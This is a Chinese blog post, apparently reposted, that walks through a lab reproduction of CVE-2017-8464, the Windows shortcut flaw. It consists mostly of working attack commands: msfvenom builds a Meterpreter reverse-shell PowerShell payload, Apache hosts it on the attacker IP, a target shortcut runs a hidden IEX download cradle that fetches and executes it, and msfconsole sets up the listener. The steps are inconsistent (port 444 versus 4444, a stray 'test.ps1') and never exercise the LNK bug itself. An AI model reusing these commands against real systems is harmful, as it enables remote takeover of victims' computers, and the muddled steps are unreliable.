码迷,mamicode.com
首页 > 其他好文 > 详细

CVE-2017-8464复现 (远程快捷方式漏洞)

时间:2017-06-18 13:23:06      阅读:1135      评论:0      收藏:0      [点我收藏+]

标签:download   test   blog   image   nbsp   http   rsh   eve   star   

我们的攻击机IP是192.168.222.133  

目标机IP是192.168.222.132

我们首先生成一个powershell

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.222.133 LPORT=444 -f psh-reflection>1.ps1

技术分享

把生成的1.ps1 copy到/var/www/html cp /root/1.ps1 /var/www/html

技术分享

service apache2 start 然后我们访问127.0.0.1/1.ps1 是可以访问的

技术分享

我们在目标机创建快捷方式powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.222.133/1.ps1‘);test.ps1"

然后访问技术分享

创建监听,然后连接meterpreter

msfconsole

set PAYLOAD windows/x64/meterpreter/reverse_tcp

set LHOST 192.168.222.133

set LPORT 4444

exploit

技术分享

复现成功

 

CVE-2017-8464复现 (远程快捷方式漏洞)

标签:download   test   blog   image   nbsp   http   rsh   eve   star   

原文地址:http://www.cnblogs.com/haq5201314/p/7043832.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!